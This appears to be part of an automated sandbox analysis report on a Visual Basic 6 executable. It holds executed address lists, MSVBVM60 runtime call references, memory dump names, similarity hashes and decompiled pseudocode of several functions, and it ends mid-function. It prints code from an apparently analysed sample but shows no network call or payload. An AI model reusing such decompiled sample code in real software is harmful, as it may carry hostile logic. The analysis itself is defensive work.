0x00427498
0x0042749d
0x004274b5
0x004274b8
0x004274ba
0x004274c7
0x004274e9
0x004274c9
0x004274c9
0x004274cb
0x004274d0
0x004274d6
0x004274dc
0x004274e1
0x004274e1
0x004274f0
0x004274f2
0x004274f5
0x004274fd
0x00427505
0x00427505
0x0042750a
0x00427511
0x00427518
0x0042751f
0x00427520
0x00427551
0x00427559
0x00427561
0x00427569
0x0042756e

APIs

__vbaChkstk.MSVBVM60(?,00401576), ref: 00426EF0
__vbaStrCopy.MSVBVM60(?,?,?,?,00401576), ref: 00426F1D
__vbaVarDup.MSVBVM60 ref: 00426F46
#557.MSVBVM60(?), ref: 00426F4F
__vbaFreeVar.MSVBVM60(?), ref: 00426F69
#554.MSVBVM60(?), ref: 00426F84
__vbaNew2.MSVBVM60(004041C8,0043033C,?), ref: 00426FA3
__vbaHresultCheckObj.MSVBVM60(00000000,?,004041B8,0000004C), ref: 00427005
__vbaHresultCheckObj.MSVBVM60(00000000,?,00404280,00000028), ref: 00427057
__vbaFreeObj.MSVBVM60(00000000,?,00404280,00000028), ref: 0042706E
__vbaNew2.MSVBVM60(004041C8,0043033C), ref: 0042708D
__vbaHresultCheckObj.MSVBVM60(00000000,?,004041B8,00000014), ref: 004270EF
__vbaHresultCheckObj.MSVBVM60(00000000,?,004041D8,00000058), ref: 00427145
__vbaStrMove.MSVBVM60(00000000,?,004041D8,00000058), ref: 0042716F
__vbaFreeObj.MSVBVM60(00000000,?,004041D8,00000058), ref: 00427177
__vbaOnError.MSVBVM60(000000FF), ref: 00427185
#593.MSVBVM60(0000000A,000000FF), ref: 004271A3
__vbaFreeVar.MSVBVM60(0000000A,000000FF), ref: 004271AE
__vbaNew2.MSVBVM60(004041C8,0043033C,0000000A,000000FF), ref: 004271CD
__vbaHresultCheckObj.MSVBVM60(00000000,?,004041B8,00000014), ref: 0042722F
__vbaHresultCheckObj.MSVBVM60(00000000,?,004041D8,000000E0), ref: 0042728B
__vbaStrMove.MSVBVM60(00000000,?,004041D8,000000E0), ref: 004272B5
__vbaFreeObj.MSVBVM60(00000000,?,004041D8,000000E0), ref: 004272BD
__vbaNew2.MSVBVM60(004041C8,0043033C), ref: 004272DC
__vbaHresultCheckObj.MSVBVM60(00000000,?,004041B8,00000014), ref: 0042733E
__vbaHresultCheckObj.MSVBVM60(00000000,?,004041D8,00000110), ref: 0042739A
__vbaStrMove.MSVBVM60(00000000,?,004041D8,00000110), ref: 004273C4
__vbaFreeObj.MSVBVM60(00000000,?,004041D8,00000110), ref: 004273CC
#680.MSVBVM60(?,?,?,?,?,?,0000000A,0000000A,0000000A), ref: 00427427
__vbaFreeVarList.MSVBVM60(00000003,0000000A,0000000A,0000000A,?,?,?,?,?,?,0000000A,0000000A,0000000A), ref: 0042743D
__vbaNew2.MSVBVM60(0040516C,00430010,?,?,?,00401576), ref: 0042745F
__vbaObjSet.MSVBVM60(?,00000000), ref: 00427498
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403E40,00000050), ref: 004274DC
#580.MSVBVM60(?,00000001), ref: 004274F5
__vbaFreeStr.MSVBVM60(?,00000001), ref: 004274FD
__vbaFreeObj.MSVBVM60(?,00000001), ref: 00427505
__vbaFreeStr.MSVBVM60(0042756F,?), ref: 00427551
__vbaFreeStr.MSVBVM60(0042756F,?), ref: 00427559
__vbaFreeStr.MSVBVM60(0042756F,?), ref: 00427561
__vbaFreeStr.MSVBVM60(0042756F,?), ref: 00427569

Strings

7/7/7, xrefs: 00426F29

Memory Dump Source

Source File: 00000000.00000002.254091440.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.254085568.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254281684.0000000000430000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254289363.0000000000432000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresult$New2$Move$#554#557#580#593#680ChkstkCopyErrorList
String ID: 7/7/7
API String ID: 2782184185-2801222292
Opcode ID: 027faf04605cc44de8ced8aa76127c50bc99c9000289e0737ef645d2fa25504c
Instruction ID: a598e560c1749393174b69c9cc2da913c6e6fef0a94555d5de48abf907e912d8
Opcode Fuzzy Hash: 027faf04605cc44de8ced8aa76127c50bc99c9000289e0737ef645d2fa25504c
Instruction Fuzzy Hash: 7102E270D00228DFDB20EF91C945BDDBBB5AF08304F1081EAE519B72A1D7B85A89DF59

Uniqueness

Uniqueness Score: -1.00%

Function 00401780, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 13COMMON

Download Yara Rule

APIs

#100.MSVBVM60(VB5!6&*), ref: 00401785

Strings

VB5!6&*, xrefs: 00401780

Memory Dump Source

Source File: 00000000.00000002.254091440.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.254085568.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254281684.0000000000430000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254289363.0000000000432000.00000002.00020000.sdmp Download File

Similarity

API ID: #100
String ID: VB5!6&*
API String ID: 1341478452-3593831657
Opcode ID: 2c2dfa5b58f075402068bd394f0c7438c1a0b3592bb6d5149beb4fa206a9724a
Instruction ID: ca5d4f642a05318c8dcd24fa4237ddb1c9ad5238758e6de23f2efbedae005bdf
Opcode Fuzzy Hash: 2c2dfa5b58f075402068bd394f0c7438c1a0b3592bb6d5149beb4fa206a9724a
Instruction Fuzzy Hash: 98D0B60244E3C21EE74316720922A4A3F708C1369071B06EB9084EF0E3849C084A9736

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 02231ED8, Relevance: .1, Instructions: 120COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.254608244.0000000002230000.00000040.00000001.sdmp, Offset: 02230000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ccc372cbf14908c93447917d41beec023f79f10d590e72d74514782c6e16e229
Instruction ID: c71eca1b22f4aa2bbefea72ef8544c016579576a05b633a32fb59cb88ff87641
Opcode Fuzzy Hash: ccc372cbf14908c93447917d41beec023f79f10d590e72d74514782c6e16e229
Instruction Fuzzy Hash: 3C4134F0270301EFEB16AEA4CC55BE973A6AF14750F514209ED8A8B1E9C7B5D884CA12

Uniqueness

Uniqueness Score: -1.00%

Function 0223648A, Relevance: .1, Instructions: 111COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.254608244.0000000002230000.00000040.00000001.sdmp, Offset: 02230000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f8d7a3f32b6fcd7f357dc007a48b1339fc4a2109ff9e2688f5cadfd4587c0f04
Instruction ID: 8d4e461f9b0b68c5d48e04dfb8a09eb100bc3659ec941c2373d56baea33cf1ca
Opcode Fuzzy Hash: f8d7a3f32b6fcd7f357dc007a48b1339fc4a2109ff9e2688f5cadfd4587c0f04
Instruction Fuzzy Hash: 6241B6819287D376C3238BB844183A16FAA2D87538B4D03DC8AE25B4FEC753C146C349

Uniqueness

Uniqueness Score: -1.00%

Function 02231C8F, Relevance: .1, Instructions: 109COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.254608244.0000000002230000.00000040.00000001.sdmp, Offset: 02230000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5a948d9df425047baf3d290b552a09d60dc82d5e16cb8404d1fdd41c571868a8
Instruction ID: 7c828584fd6b959295bbed173870d83cbb4432ceb8ec83f5f74d5c696e30a680
Opcode Fuzzy Hash: 5a948d9df425047baf3d290b552a09d60dc82d5e16cb8404d1fdd41c571868a8
Instruction Fuzzy Hash: 30312BB1734201DFE75A9AA8CC90BA673E9BF05320F104229FC5EC3299DBA1E854CB40

Uniqueness

Uniqueness Score: -1.00%

Function 02231EEC, Relevance: .1, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.254608244.0000000002230000.00000040.00000001.sdmp, Offset: 02230000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9657e284f84811e475e79eb65643399a358ef8bc2d89cd1a6a1bb033753ec6f2
Instruction ID: 590f9a89de7d977ee1762d4b750d8350607e4742063ebdcfc0ddc091e49b86bb
Opcode Fuzzy Hash: 9657e284f84811e475e79eb65643399a358ef8bc2d89cd1a6a1bb033753ec6f2
Instruction Fuzzy Hash: 4F2108F0670301EBE7169F648C55FE562A7AF54B10F41411CED8A4B1F9C7A6C885CA16

Uniqueness

Uniqueness Score: -1.00%

Function 02231F14, Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.254608244.0000000002230000.00000040.00000001.sdmp, Offset: 02230000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc6ebee82fd90bc9a2990cc006f3858c443e26f93cfacaf90f7c5a945e22fbf3
Instruction ID: e4e861ef5b835bf43d22216180588936a2f350956cb042de13773ee680675c58
Opcode Fuzzy Hash: dc6ebee82fd90bc9a2990cc006f3858c443e26f93cfacaf90f7c5a945e22fbf3
Instruction Fuzzy Hash: 752103B0264341EFE3279FB48D55FE677A6AF14B00F048148ED894B1FAC3A5D840CA12

Uniqueness

Uniqueness Score: -1.00%

Function 02234FA8, Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.254608244.0000000002230000.00000040.00000001.sdmp, Offset: 02230000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1fe0f385c8e2e2f3c2b3481ffe62edbe674fa0a5d8d0fc7619a2744788f96f97
Instruction ID: 1c6b19d7ca5b98f33740fd9bbcb5717223b7d85df90f9d65cb730cb0771d4900
Opcode Fuzzy Hash: 1fe0f385c8e2e2f3c2b3481ffe62edbe674fa0a5d8d0fc7619a2744788f96f97
Instruction Fuzzy Hash: 10F0A0B83302028FC316EE94C0C4F5673A2BF5CB40F8184A9E40ACB61EC732D891CAA1

Uniqueness

Uniqueness Score: -1.00%

Function 02232ADD, Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.254608244.0000000002230000.00000040.00000001.sdmp, Offset: 02230000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c07af53bef296051d988e91cc8ce27a1024ab41b0d16efaf481d751acdcd154
Instruction ID: 351d0f46045a770b000e41b9ee797aab3bee6dd22dc3ccb95ba718e950dbb0e2
Opcode Fuzzy Hash: 6c07af53bef296051d988e91cc8ce27a1024ab41b0d16efaf481d751acdcd154
Instruction Fuzzy Hash: E6E04FF3224101AFD71ACE58C190B2677A1BB45354F10445CE447DB750C722E955C710

Uniqueness

Uniqueness Score: -1.00%

Function 02235232, Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.254608244.0000000002230000.00000040.00000001.sdmp, Offset: 02230000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 999bcddb5915d9afde9b3de7d408ce0897c80fb5eedd3644fc7bbd051f8a0ded
Instruction ID: f44f2ae3f04afb69bbb1cdb7b7f37cee1a8bc1584faf4f6cd4836094c4e9c049
Opcode Fuzzy Hash: 999bcddb5915d9afde9b3de7d408ce0897c80fb5eedd3644fc7bbd051f8a0ded
Instruction Fuzzy Hash: FFB012D7B341A10A16A332F026090790403A5CE234343C6B01859A600CD9C40D560841

Uniqueness

Uniqueness Score: -1.00%

Function 0223465F, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.254608244.0000000002230000.00000040.00000001.sdmp, Offset: 02230000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab2d7faec90206d04624137dcf391b9a6c0b9a6dad95826754e4c5e29fff86cb
Instruction ID: bebcbd0f18a999ce64e2d619b59837d29f74db5f3d96bd371bc818b82041d4c7
Opcode Fuzzy Hash: ab2d7faec90206d04624137dcf391b9a6c0b9a6dad95826754e4c5e29fff86cb
Instruction Fuzzy Hash: F9B00179662A80CFCE96CF09C290E40B3B4FB48B50F4258D0E8118BB22C268E900CA10

Uniqueness

Uniqueness Score: -1.00%

Function 0042F04D, Relevance: 31.6, APIs: 17, Strings: 1, Instructions: 107
COMMON

Download Yara Rule

C-Code - Quality: 56%

			E0042F04D(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, char* _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v28;
				signed int _v32;
				char _v48;
				short _v52;
				void* _v56;
				intOrPtr _v64;
				char _v72;
				char* _v80;
				char _v88;
				short _v92;
				short _t45;
				intOrPtr* _t46;
				signed int _t48;
				char* _t52;
				char* _t53;
				void* _t68;
				void* _t70;
				intOrPtr _t71;

				_t71 = _t70 - 0xc;
				 *[fs:0x0] = _t71;
				L00401570();
				_v16 = _t71;
				_v12 = 0x401540;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x4c,  *[fs:0x0], 0x401576, _t68);
				_v64 = 0x80020004;
				_v72 = 0xa;
				_t45 =  &_v72;
				_push(_t45);
				L0040163C();
				_v52 = _t45;
				L00401726();
				_t46 = _a8;
				_push( *_t46);
				_push(0x404ecc);
				L0040170E();
				if(_t46 != 0) {
					_v80 = _a8;
					_v88 = 0x4008;
					_push(0);
					_t48 =  &_v88;
					_push(_t48);
					L00401636();
					L00401744();
					_push(_t48);
					_push(0x404ecc);
					L0040170E();
					asm("sbb eax, eax");
					_v92 =  ~( ~_t48 + 1);
					L00401720();
					_t52 = _v92;
					if(_t52 == 0) {
						_t53 = _a8;
						_push( *_t53);
						_push(_v52);
						_push(0xffffffff);
						_push(1);
						L004016D2();
						while(1) {
							_push(_v52);
							L00401630();
							_t52 = _t53;
							if(_t52 != 0) {
								break;
							}
							_push(_v52);
							_push( &_v28);
							L0040162A();
							_v80 =  &_v28;
							_v88 = 0x4008;
							_push(0x10);
							L00401570();
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsd");
							_push(1);
							_push("Add");
							_t53 =  &_v48;
							_push(_t53);
							L0040161E();
							_push(_t53);
							L00401624();
							_t71 = _t71 + 0x1c;
						}
						_push(_v52);
						L00401618();
						_v32 = _v32 | 0x0000ffff;
					} else {
						_v32 = _v32 & 0x00000000;
					}
				} else {
					_v32 = _v32 & 0x00000000;
				}
				_push(0x42f1b7);
				L00401720();
				L00401726();
				return _t52;
			}

0x0042f050
0x0042f05f
0x0042f069
0x0042f071
0x0042f074
0x0042f07b
0x0042f08a
0x0042f08d
0x0042f094
0x0042f09b
0x0042f09e
0x0042f09f
0x0042f0a4
0x0042f0ab
0x0042f0b0
0x0042f0b3
0x0042f0b5
0x0042f0ba
0x0042f0c1
0x0042f0d0
0x0042f0d3
0x0042f0da
0x0042f0dc
0x0042f0df
0x0042f0e0
0x0042f0ea
0x0042f0ef
0x0042f0f0
0x0042f0f5
0x0042f0fc
0x0042f101
0x0042f108
0x0042f10d
0x0042f113
0x0042f11c
0x0042f11f
0x0042f121
0x0042f124
0x0042f126
0x0042f128
0x0042f12d
0x0042f12d
0x0042f130
0x0042f135
0x0042f13a
0x00000000
0x00000000
0x0042f13c
0x0042f142
0x0042f143
0x0042f14b
0x0042f14e
0x0042f155
0x0042f158
0x0042f162
0x0042f163
0x0042f164
0x0042f165
0x0042f166
0x0042f168
0x0042f16d
0x0042f170
0x0042f171
0x0042f176
0x0042f177
0x0042f17c
0x0042f17c
0x0042f181
0x0042f184
0x0042f189
0x0042f115
0x0042f115
0x0042f115
0x0042f0c3
0x0042f0c3
0x0042f0c3
0x0042f18e
0x0042f1a9
0x0042f1b1
0x0042f1b6

APIs

__vbaChkstk.MSVBVM60(?,00401576), ref: 0042F069
#648.MSVBVM60(0000000A), ref: 0042F09F
__vbaFreeVar.MSVBVM60(0000000A), ref: 0042F0AB
__vbaStrCmp.MSVBVM60(00404ECC,?,0000000A), ref: 0042F0BA
#645.MSVBVM60(?,00000000,00404ECC,?,0000000A), ref: 0042F0E0
__vbaStrMove.MSVBVM60(?,00000000,00404ECC,?,0000000A), ref: 0042F0EA
__vbaStrCmp.MSVBVM60(00404ECC,00000000,?,00000000,00404ECC,?,0000000A), ref: 0042F0F5
__vbaFreeStr.MSVBVM60(00404ECC,00000000,?,00000000,00404ECC,?,0000000A), ref: 0042F108
__vbaFreeStr.MSVBVM60(0042F1B7,?,?,00000001,000000FF,?,?,00404ECC,00000000,?,00000000,00404ECC,?,0000000A), ref: 0042F1A9
__vbaFreeVar.MSVBVM60(0042F1B7,?,?,00000001,000000FF,?,?,00404ECC,00000000,?,00000000,00404ECC,?,0000000A), ref: 0042F1B1

Strings

Add, xrefs: 0042F168

Memory Dump Source

Source File: 00000000.00000002.254091440.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.254085568.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254281684.0000000000430000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254289363.0000000000432000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$#645#648ChkstkMove
String ID: Add
API String ID: 4182468812-3310826759
Opcode ID: c6b8dc80d04076300d02dab80d84dd0c4244a92192e9d3d28e48711bdb4c7d38
Instruction ID: 29f58ac1d08cd27a06bdde180c39a0353be17b9e258aa6d72a5125e7038426e8
Opcode Fuzzy Hash: c6b8dc80d04076300d02dab80d84dd0c4244a92192e9d3d28e48711bdb4c7d38
Instruction Fuzzy Hash: 63413D71D10208EBDB00EFE5DD42AAE77B5AF04744F90443AF501BB1E1EB7D990A8B59

Uniqueness

Uniqueness Score: -1.00%

Function 0041FE82, Relevance: 28.7, APIs: 19, Instructions: 222
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E0041FE82(void* __ebx, void* __edi, void* __esi, signed int __fp0, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				char _v40;
				intOrPtr _v48;
				intOrPtr _v56;
				intOrPtr _v64;
				intOrPtr _v72;
				intOrPtr _v80;
				intOrPtr _v88;
				short _v92;
				intOrPtr* _v96;
				signed int _v100;
				intOrPtr* _v104;
				signed int _v108;
				intOrPtr* _v120;
				signed int _v124;
				intOrPtr* _v128;
				signed int _v132;
				intOrPtr* _v136;
				signed int _v140;
				intOrPtr* _v144;
				short _v148;
				signed int _v152;
				signed int _v156;
				char* _t103;
				signed int _t106;
				char* _t110;
				signed int _t113;
				char* _t117;
				signed int _t121;
				char* _t125;
				signed int _t132;
				char* _t134;
				intOrPtr _t149;
				void* _t158;
				void* _t160;
				intOrPtr _t161;
				signed int _t171;

				_t171 = __fp0;
				_t161 = _t160 - 0xc;
				 *[fs:0x0] = _t161;
				L00401570();
				_v16 = _t161;
				_v12 = 0x401390;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x401576, _t158);
				if( *0x430010 != 0) {
					_v120 = 0x430010;
				} else {
					_push(0x430010);
					_push(0x40516c);
					L0040175C();
					_v120 = 0x430010;
				}
				_t103 =  &_v36;
				L00401762();
				_v96 = _t103;
				_t106 =  *((intOrPtr*)( *_v96 + 0x1d8))(_v96, _t103,  *((intOrPtr*)( *((intOrPtr*)( *_v120)) + 0x32c))( *_v120));
				asm("fclex");
				_v100 = _t106;
				if(_v100 >= 0) {
					_v124 = _v124 & 0x00000000;
				} else {
					_push(0x1d8);
					_push(0x403e40);
					_push(_v96);
					_push(_v100);
					L00401756();
					_v124 = _t106;
				}
				L00401750();
				if( *0x430010 != 0) {
					_v128 = 0x430010;
				} else {
					_push(0x430010);
					_push(0x40516c);
					L0040175C();
					_v128 = 0x430010;
				}
				_t110 =  &_v36;
				L00401762();
				_v96 = _t110;
				_t113 =  *((intOrPtr*)( *_v96 + 0x1c8))(_v96, _t110,  *((intOrPtr*)( *((intOrPtr*)( *_v128)) + 0x490))( *_v128));
				asm("fclex");
				_v100 = _t113;
				if(_v100 >= 0) {
					_v132 = _v132 & 0x00000000;
				} else {
					_push(0x1c8);
					_push(0x403e40);
					_push(_v96);
					_push(_v100);
					L00401756();
					_v132 = _t113;
				}
				L00401750();
				if( *0x430010 != 0) {
					_v136 = 0x430010;
				} else {
					_push(0x430010);
					_push(0x40516c);
					L0040175C();
					_v136 = 0x430010;
				}
				_t117 =  &_v36;
				L00401762();
				_v96 = _t117;
				_t121 =  *((intOrPtr*)( *_v96 + 0xe0))(_v96,  &_v92, _t117,  *((intOrPtr*)( *((intOrPtr*)( *_v136)) + 0x35c))( *_v136));
				asm("fclex");
				_v100 = _t121;
				if(_v100 >= 0) {
					_v140 = _v140 & 0x00000000;
				} else {
					_push(0xe0);
					_push(0x403e40);
					_push(_v96);
					_push(_v100);
					L00401756();
					_v140 = _t121;
				}
				if( *0x430010 != 0) {
					_v144 = 0x430010;
				} else {
					_push(0x430010);
					_push(0x40516c);
					L0040175C();
					_v144 = 0x430010;
				}
				_t149 =  *((intOrPtr*)( *_v144));
				_t125 =  &_v40;
				L00401762();
				_v104 = _t125;
				_v80 = 0x80020004;
				_v88 = 0xa;
				_v64 = 0x80020004;
				_v72 = 0xa;
				_v48 = 0x80020004;
				_v56 = 0xa;
				L00401570();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				L00401570();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				L00401570();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v148 = _v92;
				asm("fild dword [ebp-0x90]");
				_v152 = _t171;
				_v108 = _v152;
				_t132 =  *((intOrPtr*)( *_v104 + 0x1d0))(_v104, _t149, 0x10, 0x10, 0x10, _t125,  *((intOrPtr*)(_t149 + 0x34c))( *_v144));
				asm("fclex");
				_v108 = _t132;
				if(_v108 >= 0) {
					_v156 = _v156 & 0x00000000;
				} else {
					_push(0x1d0);
					_push(0x403e40);
					_push(_v104);
					_push(_v108);
					L00401756();
					_v156 = _t132;
				}
				_push( &_v40);
				_t134 =  &_v36;
				_push(_t134);
				_push(2);
				L0040172C();
				_v32 = 0xa1c62470;
				_v28 = 0x5af3;
				asm("wait");
				_push(0x4201b1);
				return _t134;
			}

0x0041fe82
0x0041fe85
0x0041fe94
0x0041fea0
0x0041fea8
0x0041feab
0x0041feb2
0x0041fec1
0x0041fecb
0x0041fee5
0x0041fecd
0x0041fecd
0x0041fed2
0x0041fed7
0x0041fedc
0x0041fedc
0x0041ff00
0x0041ff04
0x0041ff09
0x0041ff14
0x0041ff1a
0x0041ff1c
0x0041ff23
0x0041ff3f
0x0041ff25
0x0041ff25
0x0041ff2a
0x0041ff2f
0x0041ff32
0x0041ff35
0x0041ff3a
0x0041ff3a
0x0041ff46
0x0041ff52
0x0041ff6c
0x0041ff54
0x0041ff54
0x0041ff59
0x0041ff5e
0x0041ff63
0x0041ff63
0x0041ff87
0x0041ff8b
0x0041ff90
0x0041ff9b
0x0041ffa1
0x0041ffa3
0x0041ffaa
0x0041ffc6
0x0041ffac
0x0041ffac
0x0041ffb1
0x0041ffb6
0x0041ffb9
0x0041ffbc
0x0041ffc1
0x0041ffc1
0x0041ffcd
0x0041ffd9
0x0041fff6
0x0041ffdb
0x0041ffdb
0x0041ffe0
0x0041ffe5
0x0041ffea
0x0041ffea
0x0042001a
0x0042001e
0x00420023
0x00420032
0x00420038
0x0042003a
0x00420041
0x00420060
0x00420043
0x00420043
0x00420048
0x0042004d
0x00420050
0x00420053
0x00420058
0x00420058
0x0042006e
0x0042008b
0x00420070
0x00420070
0x00420075
0x0042007a
0x0042007f
0x0042007f
0x004200a5
0x004200af
0x004200b3
0x004200b8
0x004200bb
0x004200c2
0x004200c9
0x004200d0
0x004200d7
0x004200de
0x004200e8
0x004200f2
0x004200f3
0x004200f4
0x004200f5
0x004200f9
0x00420103
0x00420104
0x00420105
0x00420106
0x0042010a
0x00420114
0x00420115
0x00420116
0x00420117
0x0042011c
0x00420122
0x00420128
0x00420135
0x00420140
0x00420146
0x00420148
0x0042014f
0x0042016e
0x00420151
0x00420151
0x00420156
0x0042015b
0x0042015e
0x00420161
0x00420166
0x00420166
0x00420178
0x00420179
0x0042017c
0x0042017d
0x0042017f
0x00420187
0x0042018e
0x00420195
0x00420196
0x00000000

APIs

__vbaChkstk.MSVBVM60(?,00401576), ref: 0041FEA0
__vbaNew2.MSVBVM60(0040516C,00430010,?,?,?,?,00401576), ref: 0041FED7
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041FF04
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403E40,000001D8), ref: 0041FF35
__vbaFreeObj.MSVBVM60 ref: 0041FF46
__vbaNew2.MSVBVM60(0040516C,00430010), ref: 0041FF5E
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041FF8B
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403E40,000001C8), ref: 0041FFBC
__vbaFreeObj.MSVBVM60 ref: 0041FFCD
__vbaNew2.MSVBVM60(0040516C,00430010), ref: 0041FFE5
__vbaObjSet.MSVBVM60(?,00000000), ref: 0042001E
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403E40,000000E0), ref: 00420053
__vbaNew2.MSVBVM60(0040516C,00430010), ref: 0042007A
__vbaObjSet.MSVBVM60(?,00000000), ref: 004200B3
__vbaChkstk.MSVBVM60(?,00000000), ref: 004200E8
__vbaChkstk.MSVBVM60(?,00000000), ref: 004200F9
__vbaChkstk.MSVBVM60(?,00000000), ref: 0042010A
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403E40,000001D0,?,?,00000000), ref: 00420161
__vbaFreeObjList.MSVBVM60(00000002,?,?,?,?,00000000), ref: 0042017F

Memory Dump Source

Source File: 00000000.00000002.254091440.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.254085568.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254281684.0000000000430000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254289363.0000000000432000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$CheckChkstkHresultNew2$Free$List
String ID:
API String ID: 4119418001-0
Opcode ID: 2755e472f1a51f5f7e5cdff04c74de7a2958fa6070f03b0f37f7da2571af2483
Instruction ID: 40de1d32860e2095af8a2162a78c7d516d8f517be1c772d6544539bc000587ee
Opcode Fuzzy Hash: 2755e472f1a51f5f7e5cdff04c74de7a2958fa6070f03b0f37f7da2571af2483
Instruction Fuzzy Hash: 16918674D00218EFCB10DFA1D949BDEBBB5BF08304F20406AE015BB2A1CBB95945DF58

Uniqueness

Uniqueness Score: -1.00%

Function 00420792, Relevance: 27.2, APIs: 18, Instructions: 192
COMMON

Download Yara Rule

C-Code - Quality: 47%

			E00420792(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v24;
				char _v32;
				intOrPtr _v40;
				intOrPtr _v48;
				intOrPtr _v56;
				char _v64;
				intOrPtr _v72;
				intOrPtr* _v76;
				signed int _v80;
				intOrPtr* _v88;
				signed int _v92;
				intOrPtr* _v96;
				signed int _v100;
				intOrPtr* _v104;
				signed int _v108;
				char* _t77;
				signed int _t81;
				char* _t85;
				signed int _t91;
				char* _t95;
				signed int _t99;
				intOrPtr _t108;
				intOrPtr _t128;

				_push(0x401576);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t128;
				_push(0x58);
				L00401570();
				_v12 = _t128;
				_v8 = 0x4013f8;
				if( *0x430010 != 0) {
					_v88 = 0x430010;
				} else {
					_push(0x430010);
					_push(0x40516c);
					L0040175C();
					_v88 = 0x430010;
				}
				_t77 =  &_v24;
				L00401762();
				_v76 = _t77;
				_v32 = 0x80020004;
				_v40 = 0xa;
				L00401570();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t81 =  *((intOrPtr*)( *_v76 + 0x1cc))(_v76, 0x10, _t77,  *((intOrPtr*)( *((intOrPtr*)( *_v88)) + 0x49c))( *_v88));
				asm("fclex");
				_v80 = _t81;
				if(_v80 >= 0) {
					_v92 = _v92 & 0x00000000;
				} else {
					_push(0x1cc);
					_push(0x403e40);
					_push(_v76);
					_push(_v80);
					L00401756();
					_v92 = _t81;
				}
				L00401750();
				if( *0x430010 != 0) {
					_v96 = 0x430010;
				} else {
					_push(0x430010);
					_push(0x40516c);
					L0040175C();
					_v96 = 0x430010;
				}
				_t108 =  *((intOrPtr*)( *_v96));
				_t85 =  &_v24;
				L00401762();
				_v76 = _t85;
				_v64 = 0x80020004;
				_v72 = 0xa;
				_v48 = 0x80020004;
				_v56 = 0xa;
				_v32 = 0x80020004;
				_v40 = 0xa;
				L00401570();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				L00401570();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				L00401570();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v64 =  *0x4013f0;
				_t91 =  *((intOrPtr*)( *_v76 + 0x1d0))(_v76, _t108, 0x10, 0x10, 0x10, _t85,  *((intOrPtr*)(_t108 + 0x314))( *_v96));
				asm("fclex");
				_v80 = _t91;
				if(_v80 >= 0) {
					_v100 = _v100 & 0x00000000;
				} else {
					_push(0x1d0);
					_push(0x403e40);
					_push(_v76);
					_push(_v80);
					L00401756();
					_v100 = _t91;
				}
				L00401750();
				if( *0x430010 != 0) {
					_v104 = 0x430010;
				} else {
					_push(0x430010);
					_push(0x40516c);
					L0040175C();
					_v104 = 0x430010;
				}
				_t95 =  &_v24;
				L00401762();
